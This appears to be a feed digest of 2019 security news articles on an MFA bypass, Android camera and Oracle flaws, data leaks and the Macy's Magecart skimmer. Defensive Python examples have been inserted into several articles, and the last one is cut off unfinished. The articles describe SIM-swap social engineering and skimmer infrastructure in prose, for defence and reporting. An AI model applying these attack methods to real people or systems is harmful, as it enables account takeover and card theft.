STE WILLIAMS

UK public sector IT chiefs shrug off breach threats: The data we hold isn’t that important

Half of UK public sector IT chiefs think the data they’re responsible for protecting is less valuable than private sector information, according to a survey by antivirus firm Sophos.

Just over 50 per cent of 420 senior managers quizzed by Sophos agreed with the statement: “The data held by my organisation is less valuable than data in a private sector organisation.”

Sophos opined that this “could result in the under-protection of digital data, and sits at odds with the fact that IT leaders consistently rate their organisation’s threat level and risk as higher and wider than those dealing with everyday IT issues”.

Those surveyed included C-suite bods right down to frontline IT teams “in the NHS, education and government sectors”, according to Sophos.

Spelling out why this belief that public sector data is less valuable than everyone else’s data is really quite dangerous, Jonathan Lee, Sophos’s UK public sector relations director, went through it step by step.

He said: “Sensitive data for up to 66 million UK citizens could become available to the highest bidder on the dark web or among other criminal groups that buy and sell personally identifiable information (PII) like names, addresses, National Insurance numbers, tax returns, confidential medical records, passport details, and more,” adding: “Cybercriminals can then use this data for spear-phishing, identity theft, breaching networks, or extortion.”

Two-thirds of senior IT folk said they had had problems with ransomware during the preceding year, while just 16 per cent of IT bods were incautious enough to make the same confession. Perhaps reflecting the state of media reporting on security, 45 per cent of execs reckoned there had been a “large increase” in “IT security incidents”, compared to an impressive 4 per cent of frontline techies.

Mildly worryingly, a fifth of non-managers responding to the survey said they didn’t know whether their organisation had a predefined process in place to deal with ransomware incidents, with a similar number saying there was no plan to deal with ransomware in their corner of the public sector IT estate. One in 10 middle managers thought their organisation had no ransomware plan at all, while 95 per cent of top execs thought there was.

On a lighter note, of the 784 people surveyed by Sophos, 39 per cent of senior execs thought the biggest cause for concern over IT security was the rise of remote and flexible working – while coalface IT bods thought malware was their biggest worry. When it came to cited issues, middle managers, meanwhile, were torn between (a lack of) employee skills and targeted ransomware attacks. ®


Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2019/11/20/public_sector_it_chiefs_undervalue_org_data/

Vulnerability Could Give Criminals Camera Control on Millions of Android Smartphones

Unauthorized activities could be triggered even if a phone is locked, its screen is turned off, or a person is in the middle of a call.

A vulnerability in some Android phones from vendors including Google and Samsung could allow criminals to take control of hundreds of millions of users’ smartphone camera apps, enabling them to take photos, record videos and audio, and deduce locations — all without users’ knowledge or consent.

In a blog post Tuesday, Checkmarx researchers Erez Yalon and Pedro Umbelino described how they “cracked into the applications themselves that control these cameras to identify potential abuse scenarios.” They found permission bypass vulnerabilities, designated CVE-2019-2234, initially in two Google Pixel models that could allow a malicious actor to control the camera and gain access to stored photos, videos, and GPS metadata. The unauthorized activities could be triggered, the researchers wrote, even if a phone is locked, its screen is turned off, or a person is in the middle of a call. They went on to discover other phones running the Android operating system, including those from Samsung, had the same issue.

Yalon and Umbelino provided a proof-of-concept app that demonstrated how the vulnerability could be exploited. Under responsible disclosure procedures, Checkmarx first notified Google of the vulnerability in July. Google has released a patch for its devices via the Play Store and has made the update available to all hardware partners. Samsung and other vendors were notified in mid-August and have since released fixes.




Article source: https://www.darkreading.com/application-security/vulnerability-could-give-criminals-camera-control-on-millions-of-android-smartphones/d/d-id/1336413?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Why Multifactor Authentication Is Now a Hacker Target

SIM swaps, insecure web design, phishing, and channel-jacking are four ways attackers are circumventing MFA technology, according to the FBI.

The growing adoption of multifactor authentication (MFA) has resulted in a proportionate rise in cyberattacks that target MFA technologies. In a recent Private Industry Notification (PIN), the Federal Bureau of Investigation (FBI) recognized how recent cyberattack campaigns are focusing directly on circumventing MFA. The FBI outlined three specific and comprehensive tactics that hackers have been developing in order to bypass MFA. 

One of the first MFA notifications mentioned by the FBI PIN outlines the growing number of Subscriber Identity Module (SIM) card-swapping attacks. Each telephony-capable mobile device has an onboard SIM card, programmed with the customer’s phone number, and tied to his or her respective account with the carrier. A SIM-swap attack involves switching a victim’s phone number over to a different SIM card on a device controlled by a hacker. This is often accomplished through social engineering of cellular phone customer service representatives, who are often unprepared to handle these savvy adversaries.

To social engineer such an attack, an adversary tries to take advantage of a person’s naturally trusting tendencies. For example, the attacker might call the victim’s carrier posing as the victim in an emergency situation, demanding that the target phone number be transferred immediately to a different SIM card on a new device. In an effort to help the struggling “customer” reach a resolution quickly, many representatives end up processing the hacker’s request. The result: The adversary now has a device with the victim’s phone number programmed to it, while cellular service to the victim’s actual device is disconnected.

SIM Swap

The damage that can be wrought by a successful SIM swap can be catastrophic. If the perpetrator knows the victim’s credentials for a website, any text message MFA one-time password (OTP) will be sent to the victim’s number, which now arrives on the attacker’s device. Even if the adversary doesn’t know the victim’s credentials, it becomes possible to use the “forgot password” service to receive an MFA OTP text message that can be used to reset the victim’s password. The attacker can even call services posing as the victim, using the victim’s actual number. This number will be recognized by the service in question as legitimate, possibly allowing the attacker to bypass any additional security checks. With this level of control, it becomes possible to alter all credentials to lock the victim out of his or her own accounts. All the while, the victim remains unaware of these events, unable to make or receive calls or text messages on his or her own device.

Insecure Web Design

Another MFA circumvention method outlined by the FBI is derived from poorly designed and insecure websites. The FBI highlighted how a competent attacker had previously managed to manipulate a vulnerable bank website into bypassing MFA. The adversary managed to accomplish this by inserting a custom command string into the web address once it presents an MFA request. The command string not only resulted in the MFA request being bypassed, but the bank also officially recognized the attacker’s computer as a trusted device on the victim’s account, resulting in unrestricted access to the account in question.
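The defence against the web-design flaw the FBI describes is that MFA completion and device trust must be recorded in server-side session state that nothing in the request URL can set. The following Python model is an added example, not the FBI’s or any bank’s code (AccountService, verify_otp and trust_device are hypothetical names, and the user table is constructed): a client-supplied mfa=passed or trusted=1 parameter is parsed but carries no authority, and a device token can only exist after verify_otp has succeeded.

```python
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Optional, Tuple


@dataclass
class Session:
    """Server-side session record. Only this object decides authorization."""
    user: str
    mfa_verified: bool = False      # set solely by verify_otp()
    device_trusted: bool = False    # set solely from a token issued by trust_device()
    pending_otp: Optional[str] = None


class AccountService:
    """Hypothetical bank-style service (constructed for this example)."""

    def __init__(self, users: Dict[str, str]) -> None:
        self._users = users                        # username -> password (sample data)
        self._sessions: Dict[str, Session] = {}
        self._device_tokens: Dict[str, str] = {}   # device token -> username

    def login(self, user: str, password: str, device_token: Optional[str] = None) -> str:
        """Step 1: password check. Returns a session id; MFA is still pending
        unless a server-issued device token for this same user is presented."""
        expected = self._users.get(user, "").encode()
        if user not in self._users or not hmac.compare_digest(expected, password.encode()):
            raise PermissionError("bad credentials")
        sess = Session(user=user, pending_otp=f"{secrets.randbelow(10**6):06d}")
        if device_token is not None and self._device_tokens.get(device_token) == user:
            sess.device_trusted = True   # trust comes from our own token store, never from the request
            sess.pending_otp = None
        sid = secrets.token_urlsafe(16)
        self._sessions[sid] = sess
        return sid

    def otp_for_delivery(self, sid: str) -> Optional[str]:
        """Stands in for the SMS or app channel that carries the code to the user."""
        return self._sessions[sid].pending_otp

    def verify_otp(self, sid: str, code: str) -> bool:
        """Step 2: the only path that sets mfa_verified. The code is single-use:
        right or wrong it is discarded, so a failed attempt needs a fresh login."""
        sess = self._sessions[sid]
        ok = sess.pending_otp is not None and hmac.compare_digest(
            sess.pending_otp.encode(), code.encode())
        sess.pending_otp = None
        sess.mfa_verified = ok
        return ok

    def trust_device(self, sid: str) -> str:
        """Issue a device token only once MFA has completed in this session."""
        sess = self._sessions[sid]
        if not sess.mfa_verified:
            raise PermissionError("MFA not completed")
        token = secrets.token_urlsafe(32)
        self._device_tokens[token] = sess.user
        return token

    def get_account(self, sid: str, query: Dict[str, str]) -> Tuple[int, str]:
        """Protected resource. `query` (the URL parameters) is accepted for routing
        only; values such as mfa=passed or trusted=1 are deliberately never consulted."""
        sess = self._sessions.get(sid)
        if sess is None:
            return 401, "no session"
        if not (sess.mfa_verified or sess.device_trusted):
            return 403, "MFA required"
        return 200, f"account page for {sess.user}"
```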

Phishing

The final method outlined by the FBI PIN includes phishing attacks, which still remain tried-and-true methods used by data thieves to trick a victim into revealing information. For example, an attacker can send a fake message purporting to be from the victim’s financial institution, demanding he or she open a link in the message or risk an account being shut down as a security precaution. The link takes the victim to a fraudulent website designed by the attacker that serves as a proxy to (and also resembling) the legitimate website, capturing and forwarding all interactions between the victim and the legitimate website in real time. Once the user is authenticated by the legitimate website, the adversary can capture the browser session cookie that the website associates with the authenticated user. Using the captured session cookie, the result is unrestricted access to the victim’s account. This type of attack is referred to as channel-jacking.

Channel-Jacking

While these attacks can be quite effective at bypassing MFA, channel-jacking, in particular, requires advanced technical skills, including knowledge in reverse-proxy web server configuration. Various tools have been developed to streamline the overall phishing and response processes. One pair of tools the FBI highlighted was Muraena and NecroBrowser, which work in concert to automate the attack procedure. Unfortunately, by automating the complex processes involved in such campaigns, these tools allow attacks to be carried out with greater frequency, and on a much larger scale.

This column is an excerpt from an IHS Markit market report: “Multi-Factor Authentication is Becoming a Fundamental Security Necessity.”


Tanner Johnson is a cybersecurity analyst focused on IoT and transformative technologies at IHS Markit. His coverage is focused on examining the various threats that occupy the IoT technology domain, as well as opportunities and strategies that are emerging as data …

Article source: https://www.darkreading.com/endpoint/why-multifactor-authentication-is-now-a-hacker-target/a/d-id/1336361?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Black Hat Europe Q&A: Exposing the Weaknesses in Contactless Payments

Researchers Leigh-Anne Galloway and Tim Yunusov chat about their work testing Visa’s contactless payments security system vulnerabilities.

Countless financial transactions are conducted every day by customers using contactless payment systems, and next month two security researchers from Positive Technologies will show Black Hat Europe attendees how vulnerable those transactions are to bad actors.

In their Black Hat Europe Briefing, First Contact – Vulnerabilities in Contactless Payments, researchers Leigh-Anne Galloway and Tim Yunusov will show how they successfully bypassed (among other things) Visa’s £30 limit on contactless payments made via physical card in the United Kingdom. They’ll also demonstrate a few critical weak points in contactless payments, including flaws in key generation values and unpredictable numbers.

I recently chatted with the pair about their work, what they’ve learned, and why it’s so important.

Alex: What do you hope to accomplish by giving this talk at Black Hat Europe?

Leigh-Anne: There are probably two outcomes that we’d like. The first is that payment security is a very under-subscribed area, so by talking at a venue like Black Hat, we’re hoping to interest other researchers in payments. There are incredibly high barriers, or at least it seems that way from the outside. But we want to show people that it is possible to work in this area.

Secondly, one thing we noticed is that even though we have this big growth in the financial sector, over the last year we’ve seen all these digital-only “neo-banks” spring up, and at the same time payments are being monopolized at the highest level. If you look under the surface of these new digital banks, a lot of them sit on the infrastructure of existing financial institutions, like other brick-and-mortar banks. And if you go higher up the levels of the payment infrastructure, it becomes more and more like a monopoly.

So when you don’t have much competition, you stagnate in terms of standards. That means that people like Visa and MasterCard can dictate how they want to work and how they want to operate in the marketplace, and no one else regulates them, because they are the regulators of everyone else.

Alex: A Visa rep was quoted in a Forbes article responding to your research by suggesting it wasn’t a threat worth addressing. How do you feel about that response?

Leigh-Anne: Visa and MasterCard have slightly different stances on how they approach things; it is rather infuriating, and I would imagine that some of the banks feel a bit similar, because it’s them saying “we can’t be bothered to do anything about that,” whereas if you reported a security issue to a big corporation like Google, even if the issue wasn’t so significant, they’d probably resolve it rather than saying “we don’t want to do anything about it, go on your way.”

For example, there isn’t a formalized set of processes in the payment sector to deal with these things in the way that we see in bug bounty programs elsewhere, where you would formalize a process for how to categorize the risk of security issues, and how to resolve them.

But their stance is actually…in a lot of cases Visa says, based on their own data (though they don’t provide any clarity on what that data is) they say, “based on our own data, we don’t see applications of this attack in the wild, and therefore we’re not going to do anything about it.”

When we look at this idea [banks promote] that contactless payment systems have resulted in fraud reduction, you find really different views. Visa just published a statement, at the same time that we released information about our research, to say that they had a 40% reduction in fraud in contactless payments over the last two years. But if you look at the footnote, it says the source is just “Visa data” and there’s no explanation of the actual source.

If we look at data in the UK, if we look at the actionable data collected by the police, which is probably going to be on the conservative side because a lot of fraud doesn’t get reported to police, there are some significant losses. So it’s really hard to know what’s going on. 

Alex: What are you hoping Black Hat Europe attendees will get out of your talk?

Leigh-Anne: In plain language, I always try to think of payments as something everyone interacts with every day, but yet we have very little knowledge about how they work. So with the work that we do, and the presentation we’re giving, we’re hoping to remove some of that mystery and encourage people to get involved in this area, because it is massively undersubscribed, and there is a lot of work to be done.

Alex: Do you think more financial institutions should be implementing bug bounty programs, the way many tech companies do?

Leigh-Anne: I think it could be helpful. I think there’s a different view among some of those newer banks, the neobanks, where we’re finding some of them have adopted a bug bounty approach. But most of them don’t have any sort of formal framework. And if you look at the larger institutions, like HSBC, if you want to report a security issue to them, it’s almost impossible to work out how to do that.

I remember actually contacting customer services on chat and they said, “Oh you can just tell us, and we’ll pass along the information,” which…isn’t the appropriate way to share that information. But these are some of the challenges that we face. So I think it would probably accelerate a security standard; I mean of course the financial industry is pretty heavily regulated, but those standards don’t necessarily correlate strongly with security, as we know. You can be fully compliant and still be breached.

Learn more about Leigh-Anne and Tim’s Briefing (as well as lots of other cutting-edge content) in the Briefings schedule for Black Hat Europe, which returns to ExCeL London December 2-5, 2019.

For more information on what’s happening at the event and how to register, check out the Black Hat website.

Article source: https://www.darkreading.com/black-hat/black-hat-europe-qanda-exposing-the-weaknesses-in-contactless-payments/d/d-id/1336416?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Adobe Acrobat and Reader 2015 reach end of support

If you’ve been happily using Adobe Reader 2015 software for the last few years, you’re in for a rude awakening. The software vendor is ending support for these versions of its PDF-perusing product.

Adobe is bringing its support for two related products to an end: its free Acrobat Reader 2015 software, which enables people to open PDF documents without paying anything and perform basic edits, and the commercial Acrobat 2015 software that lets people create, convert, and add security and extra interactivity to their PDFs.

Adobe released both of these products in 2015, alongside Acrobat DC and Acrobat Reader DC. DC stands for Document Cloud, which is Adobe’s central cloud-based hub for managing documents.

The company’s Support Lifecycle Policy only provides five years of support from the date that its products become generally available. Adobe is pulling support on the products’ fifth anniversary, 7 April 2020.

At that point, customers won’t get technical support for their products, meaning that if you phone Adobe with a problem, its operatives won’t deal with it. More importantly, this end of support means that you won’t get any more security patches for the products either.

A lack of new security updates is a big deal, because vulnerabilities affecting later versions of its software often affect 2015 editions too. For example, it published a security advisory in October featuring seven ‘critical’ vulnerabilities and a further three ‘important’ ones, all of which affected the 2015 versions of Acrobat and Acrobat Reader.

What to do?

If you’re a 2015-edition user, you have two options.

You can trundle along with your existing software but run the risk of new vulnerabilities emerging for the product, rendering you vulnerable.

Or you can upgrade to the latest edition of Acrobat DC and Acrobat Reader DC.

You also have two options when you upgrade. You can stick with the purchasing track that applies to the 2015 releases, which is the Classic track licence. This gives you software products updated on a regular quarterly cadence with minimal extra features. That contrasts with Adobe’s Continuous track, which provides regular, more frequent and often silent updates with more features.

This subscription-based option is definitely the one that Adobe wants you to follow. From its knowledgebase article:

Subscription plans are the best way to take advantage of everything Acrobat DC has to offer. New annual and month-to-month subscription plans make Acrobat DC more affordable than ever, while also giving you access to premium Adobe Document Cloud services.

If you don’t buy the subscription option then you won’t get access to Document Cloud-based services like the Adobe Sign e-signature service.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/wKm8l-UJ2eQ/

ICO scammer Maksim Zaslavskiy to miss 2020 Tokyo Olympics over digital currency fraud

A 39-year-old man from New York has been ordered to spend the next 18 months in prison after being convicted of cryptocurrency-based securities fraud.

Brooklyn-based Maksim Zaslavskiy was handed the sentence in the New York Eastern US District Court after being convicted on one charge of conspiracy to commit wire fraud. He will also have to pay out a monetary penalty yet to be determined by Judge Raymond Dearie.

Zaslavskiy was indicted (PDF) in November of last year for his actions as the owner of Diamond Reserve Club and REcoin Group Foundation, a pair of cryptocurrency investment schemes.

In both cases it was found that Zaslavskiy had marketed and sold cryptocoins on the promise that each was backed by a real-world asset. Those assets were then used to convince investors to buy into the initial coin offering (ICO), on the promise that the value of their coins would be sustained by those real-world holdings.

In the case of REcoin, the currency was touted as having its value backed by real estate holdings that would hold up the worth of the coins, while Diamond Reserve Club was said to be backed by ownership stakes in diamonds.

The offerings were also touted as having the support of “a team of lawyers, professionals, brokers and accountants,” who were all on board. Zaslavskiy even went so far as to create detailed whitepapers for each operation, designed to further make buyers believe their investments would be handled professionally.


In both cases, however, it was found that there were no investments in any sort of real-world asset to back the coins, nor was there any team of professionals dedicated to backing the operation.

Rather, Zaslavskiy simply pocketed all of the investment money and pulled the plug on the operation before any of the coins were ever issued, leaving buyers with nothing more than a worthless certificate. It was estimated that around 1,000 people lost money in the REcoin scheme, while no estimate was given for the number of Diamond Reserve buyers.

“Zaslavskiy committed an old-fashioned fraud camouflaged as cutting-edge technology,” said US Attorney Richard Donoghue, who led the prosecution.

“This Office will continue to investigate and prosecute those who defraud investors, whether involving traditional securities or virtual currency.” ®


Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2019/11/20/ico_scammer_gets_18_months/

Half of Oracle E-Business customers open to months-old bank fraud flaw

Thousands of Oracle E-Business Suite customers are vulnerable to a security bug that can be exploited for bank fraud.

Security company Onapsis estimates that roughly half of all companies using the Oracle EBS software have not yet patched CVE-2019-2648 and CVE-2019-2633, despite Big Red having pushed out fixes for both bugs back in April.

The two vulnerabilities are found in the Thin Client Framework API and are described as reflected SQL injections. An attacker who could remotely access the EBS server via HTTPS would be able to exploit the bug and send arbitrary commands to the vulnerable machine.

While this flaw is dangerous to EBS as a whole, it is particularly bad for servers that use the Payments module included with the suite. The Payments tool allows companies to set up and schedule direct deposits and automatic money transfers to suppliers or partners as well as handle invoices and orders. The bank routing and account numbers for transfer orders are kept on the server as text files and automatically loaded when needed.

You can guess where this is going.

An attacker who exploited either of the SQL injection flaws would be able to remotely modify those transfer order files to include instructions to move cash to an account of their choosing. Instant bank fraud.

For those not convinced, Onapsis has put together a proof-of-concept video showing how the attack would work.


In a second scenario, Onapsis shows how the same bugs could be used for a slightly more old-school type of financial fraud: printing bogus checks. If the EBS server was also being used to print paper checks, the remote attacker would potentially be able to do that as well, though Onapsis notes the attacker would of course need access to the printer and the check templates, which might be stored on a different machine. Still, such an attack would at least be theoretically possible.


While the bugs themselves are serious risks (both have been given CVSS scores of 9.9), perhaps even more worrying is the vast number of machines that are believed to be vulnerable, despite a patch for both having been out since April. Onapsis estimates that as many as half of the companies running EBS have yet to actually patch their machines.

The low patch rates are in part a reflection of how most enterprise staff prioritize ERP and supply chain platforms like Oracle EBS when it comes to security. As these apps are rarely facing the general public, they can get overlooked.

“Overall, companies tend to underestimate ERP cybersecurity, since most of them rely on separation of duties or other security measures for these types of platforms,” Onapsis director of research Sebastian Bortnik told The Register.

“Based on this, it is unfortunately more common than expected to find ERP software without the latest security patches.”

Having stayed silent on the bugs since those April updates went out, the security firm is now posting additional details in the hope that more customers will be pushed to patch their systems. ®


Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2019/11/20/oracle_ebs_flaws/

Video-editing upstart bares users’ raunchy flicks to world+dog via leaky AWS bucket

A British video-editing startup exposed what is claimed to be “thousands” of user-uploaded videos, including family films and home-made pornography, in an unsecured Amazon AWS bucket.

Research by Noam Rotem and Ran Locar, for security biz vpnMentor, revealed that VEED.io left an AWS bucket completely unsecured and hosting what they summarised as “10,000s of videos” that were accessible to anyone visiting the bucket’s URL.

VEED bills itself as an online video-editing service that lets users add subtitles, text, effects and more to uploaded videos. A free tier allows this to be done for videos in 240px quality; anything better than that needs a subscription.

Rotem and Locar found that one could visit the landing page hosting the videos with a web browser and theoretically look through them at one’s leisure without needing to provide login details.

“The breached database compromised the privacy of every VEED user, exposing all content uploaded to the platform in its raw, unedited form. This included private videos of a very sensitive nature,” the pair said.

The videos were said to include “marketing material, family videos, and even home-made pornography”.

According to VPN Mentor, VEED ignored attempts in mid-October to alert them to the breach, nor did it respond to The Register’s questions when we contacted it through Twitter earlier this week.

Having waited seven days with no reply from VEED, Rotem and Locar contacted Amazon directly, which closed off public access to the bucket nine days later.

“Criminals and malicious hackers could use these videos against their creators to target them in various ways, with ruinous consequences, personally and financially,” said VPN Mentor, quite correctly pointing out that “private, intimate, home-made pornography is a valuable tool in blackmail and extortion”.

There is no mitigation for VEED users: because the videos were left online for anyone to view and download, changing your password and all the standard security advice that normally applies for a data breach won’t have any effect here. All you can do is hope that nobody’s downloaded your self-starring grumble flicks and recognised you. Contacting VEED itself would be a good idea but if the firm ignores both security researchers and questions from the media, this suggests they probably won’t bother answering customer questions.

The Israeli security research duo have revealed quite a few data breaches, including the Suprema Biostar 2 breach of August that revealed 27 million personal data records and the leaking of 20 million Ecuadorians’ data from a database hosted in Miami, Florida. Their report into Veed can be read on the VPN Mentor website. ®


Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2019/11/20/veed_io_unsecured_aws_bucket_user_videos_exposed/

Brexit bad boy Arron Banks’ Twitter account hacked: Private messages put online

Brexit-supporting businessman Arron Banks has had his Twitter account hijacked and his private messages dumped online by person or persons unknown – and random script kiddies are trying to claim the credit for it.

Banks’ account was seemingly accessed two days ago, with @arron_banks on Twitter (since suspended) being used this afternoon to spread links to a Mega.nz download page hosting a dump of the Twitter account’s full archive.

Blame for the hack was briefly claimed by an account on the social network registered as @WhitePings, who alleged it was a successful SIM swap attack carried out by whoever operated the account. However, its operators simply took other people’s screenshots of the stolen data and claimed them as their own.

One showed raw JSON being viewed in either Microsoft Word or Open Office, which aside from the obvious plagiarism seems unlikely from people capable of carrying out a SIM swap attack. Unfortunately, @WhitePings was suspended before The Register could grab screenshots.

Coming during a general election campaign where Brexit is the number one issue, the illegal accessing of Banks’ account and publication of his private direct messages, sent to other prominent political and media figures, has piqued the interest of the political and media classes alike.

Banks used his personal fortune to help fund the UK Independence Party under Nigel Farage, later switching to funding the Leave.EU campaign group. The latter played a very prominent part in the 2016 referendum on Britain leaving the European Union, and was allegedly linked to dodgy data-crunching biz Cambridge Analytica. Banks’ company, Eldon Insurance, and Leave.EU were later fined £120,000 by the Information Commissioner’s Office for using people’s personal data for political campaigning for Brexit.

Twitter account archives are part of the social media platform’s policy to let users access more of the data they happily hand over to Twitter, as explained here.

Police, GDPR, legal threats

Avon and Somerset Police has confirmed that it is investigating, with a spokesman telling the BBC: “We’re investigating whether any offences have been committed under the Computer Misuse Act after we received a report a Twitter account was compromised.”

Leave.EU’s comms chief Andy Wigmore, a friend of Banks and fellow anti-EU campaigner, tweeted this earlier:

Even in the midst of our departure from the bloc, the EU’s General Data Protection Regulation still serves some Britons well. Wigmore also said that “under the Computer Misuse Act we can and will come after you legally” if people download the data dump. El Reg is not completely sure how that works, or if he’s heard of the Streisand Effect.

Fake news is already being spread

Political campaigners immediately leapt on purported leaks from the messages to bolster their claims Banks is some kind of inherently evil wrongdoer who cares for nothing in his pursuit of political power…

… however, this one is faked, and access to the stolen data is not necessary to confirm the fakery. The arron_banks account (now suspended from Twitter) had the numeric account ID 3390728889. Because account IDs never change, an account can still be tracked even if its user changes their username.


The image in the above embedded tweet is saved here.

In that image, purporting to show raw JSON from Banks’ direct messages, the number for arron_banks checks out against the fields “senderId” and “recipientId” in two such messages. However, the receiving account number, 16373287, does not validate at all against two different account number-checking services.

Both messages share the same ID, 833613156532080837, which is not possible for genuine tweets or direct messages: each is assigned its own unique numeric ID. Moreover, the timestamp on the upper message says it was sent at 13:40:422 on 2 November 2019, whereas the second was apparently sent precisely five hours later (18:40:422), matching to within a hundredth of a second. That is wholly implausible.
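The checks described above can be automated against the archive’s JSON. As an added illustration (not code from the article or from Twitter): Twitter IDs are “snowflakes” that embed a millisecond creation time, so a message’s id can be tested against its own createdAt as well as for duplicates; decoded, 833613156532080837 was minted in February 2017, not November 2019. The message layout (senderId, recipientId, id, createdAt) follows Twitter’s data-archive export. SAMPLE_MESSAGES are constructed to mirror the faked screenshot, and KNOWN_ACCOUNTS is an assumed stand-in for the account lookup against Twitter’s API that this offline example does not perform.

```python
"""Plausibility checks for JSON that claims to be a Twitter DM archive.

Added example, not code from the article or from Twitter. The message
layout (senderId, recipientId, id, createdAt) follows Twitter's data-archive
export; SAMPLE_MESSAGES and KNOWN_ACCOUNTS are constructed for the demo.
"""
from datetime import datetime, timedelta, timezone

# Twitter "snowflake" IDs: a 41-bit millisecond timestamp counted from the
# custom epoch 2010-11-04T01:42:54.657Z, then 10 bits of worker ID and
# 12 bits of sequence number. Tweets and direct messages share the scheme.
TWITTER_EPOCH_MS = 1288834974657
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def snowflake_to_datetime(snowflake: int) -> datetime:
    """Return the UTC creation time embedded in a Twitter snowflake ID."""
    ms_since_unix_epoch = (snowflake >> 22) + TWITTER_EPOCH_MS
    return UNIX_EPOCH + timedelta(milliseconds=ms_since_unix_epoch)


def parse_created_at(ts: str) -> datetime:
    """Parse the archive's ISO 8601 form, e.g. '2019-11-02T13:40:42.200Z'."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def check_messages(messages, known_accounts, tolerance=timedelta(minutes=1)):
    """Return (message index, description) for every inconsistency found."""
    problems = []
    first_seen = {}      # id -> index of the first message carrying it
    seen_fraction = {}   # 'SS.ffffff' -> index; repeats are only a weak signal
    for i, m in enumerate(messages):
        mid = int(m["id"])
        if mid in first_seen:
            problems.append((i, f"duplicate id {mid}, already used by message {first_seen[mid]}"))
        first_seen.setdefault(mid, i)

        # The clock embedded in the id must agree with the claimed send time.
        claimed = parse_created_at(m["createdAt"])
        encoded = snowflake_to_datetime(mid)
        if abs(claimed - encoded) > tolerance:
            problems.append((i, f"createdAt {claimed.isoformat()} but id encodes {encoded.isoformat()}"))

        # Two messages agreeing to the millisecond is possible but unlikely.
        frac = claimed.strftime("%S.%f")
        if frac in seen_fraction:
            problems.append((i, f"same seconds/fraction {frac} as message {seen_fraction[frac]} (weak signal)"))
        seen_fraction.setdefault(frac, i)

        # Every participant should resolve to a real account.
        for field in ("senderId", "recipientId"):
            if m[field] not in known_accounts:
                problems.append((i, f"{field} {m[field]} is not a known account"))
    return problems


# Constructed sample mirroring the faked screenshot: two messages sharing one
# id, with createdAt values exactly five hours apart to the millisecond.
SAMPLE_MESSAGES = [
    {"senderId": "3390728889", "recipientId": "16373287",
     "id": "833613156532080837", "createdAt": "2019-11-02T13:40:42.200Z",
     "text": "(constructed)"},
    {"senderId": "16373287", "recipientId": "3390728889",
     "id": "833613156532080837", "createdAt": "2019-11-02T18:40:42.200Z",
     "text": "(constructed)"},
]
# Assumption: only the arron_banks account number is treated as verified; a
# real audit would resolve every id through Twitter's user-lookup API.
KNOWN_ACCOUNTS = {"3390728889"}


def audit_sample():
    """Run the checks over the constructed sample."""
    return check_messages(SAMPLE_MESSAGES, KNOWN_ACCOUNTS)


if __name__ == "__main__":
    print("id 833613156532080837 was minted at", snowflake_to_datetime(833613156532080837))
    for idx, why in audit_sample():
        print(f"message {idx}: {why}")
```

Run it directly to print the decoded mint time and the findings. The one-minute tolerance allows for skew between the ID generator and whatever wrote the timestamp; a genuine message passes with zero drift, while the constructed pair fails on the duplicate id, on the 2017-versus-2019 mismatch for both messages, and on the unverified account number.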

Sensible folk would do excellently to follow this advice:

Banks, via his Leave.EU political campaign, did not respond immediately to a request for comment. ®


Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2019/11/19/arron_banks_twitter_hack/

Shopped online at Macy’s last month? Might want to toss, or at least check, that card

US retailer Macy’s says that hackers planted a card-stealing malware script on its site and harvested customer details for eight days last month.

A notice (PDF) posted by the long-operating department store chain said that, between October 7 and October 15 of this year, a Magecart script was running on the checkout page of its retail website.

The script was able to capture payment card details in two ways: as they were being typed into the checkout page when placing an order, or when card details already stored on the “wallet” page of the Macy’s website were used to place an order.

“On October 15, 2019, we were alerted to a suspicious connection between macys.com and another website,” the retailer told exposed punters.

“Our security teams immediately began an investigation. Based on our investigation, we believe that on October 7, 2019 an unauthorized third party added unauthorized computer code to two pages on macys.com.”

Unfortunately for Macy’s customers, the script got pretty much everything needed for card fraud: card number, security code, and expiration date. Additionally, the malware was able to collect customer names as well as email and mailing addresses and phone numbers.

Macy’s notes that only the webpage was compromised: users who made purchases with the mobile app were not exposed. Experts say that the attack appears to be a rather bog-standard Magecart operation, albeit an extremely successful one.


“The fundamentals of the attack techniques and the obfuscated Javascript code used by the malicious Magecart threat actors in the Macy’s cyberattack involving changes to two files on the Macy’s website, including the ClientSideErrorLog.js file which is part of the common js/utils repository, are not new and appear to be similar to the digital skimming techniques and code used in a number of other Magecart attack variants we have seen in recent months,” explained Oleg Kolesnikov of Securonix Threat Research Lab.

“The infrastructure used in the attack, including the barn-x.com domain and the customized analysis.php script as part of a cPanel installation that was set up at the end of September 2019, a couple of weeks before the attack on Macy’s was executed, also appears to be similar to the one used in some of the earlier attacks, indicating that this was likely more of an opportunistic cyberattack involving certain vulnerable components identified by the malicious threat actors rather than a targeted attack against Macy’s.”

That these sorts of Magecart operations continue to succeed is a bad sign for both retailers and security providers. Because the skimming code is injected into the web page itself and runs in the customer’s browser, Magecart attacks can be harder to spot than POS malware or infections that must live on the server itself.
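One defensive control this points at, as an added example that is not code from the article, Macy’s or Securonix: pin each first-party script to a Subresource Integrity hash, alert when what the origin actually serves no longer matches, and on drift list the non-first-party hosts the changed file talks to, which is the “suspicious connection” an analyst wants to see first. BASELINE_JS and TAMPERED_JS are constructed stand-ins for a served helper script and a modified copy (the beacon carries a placeholder, not harvesting code); the hostnames (note the .invalid TLD) and FIRST_PARTY_HOSTS are hypothetical.

```python
"""Integrity drift check for first-party JavaScript, with exfil-host triage.

Added example; not code from the article, Macy's or Securonix. BASELINE_JS
and TAMPERED_JS are constructed stand-ins for a served script and a
modified copy; the hostnames (.invalid TLD) and FIRST_PARTY_HOSTS are
hypothetical.
"""
import base64
import hashlib
import re

FIRST_PARTY_HOSTS = {"www.example.com", "static.example.com"}  # assumed allowlist

BASELINE_JS = b"""// constructed stand-in for a site's error-logging helper
window.onerror = function (msg, src, line) {
  fetch('https://www.example.com/errlog', {
    method: 'POST',
    body: JSON.stringify({msg: msg, src: src, line: line})
  });
};
"""

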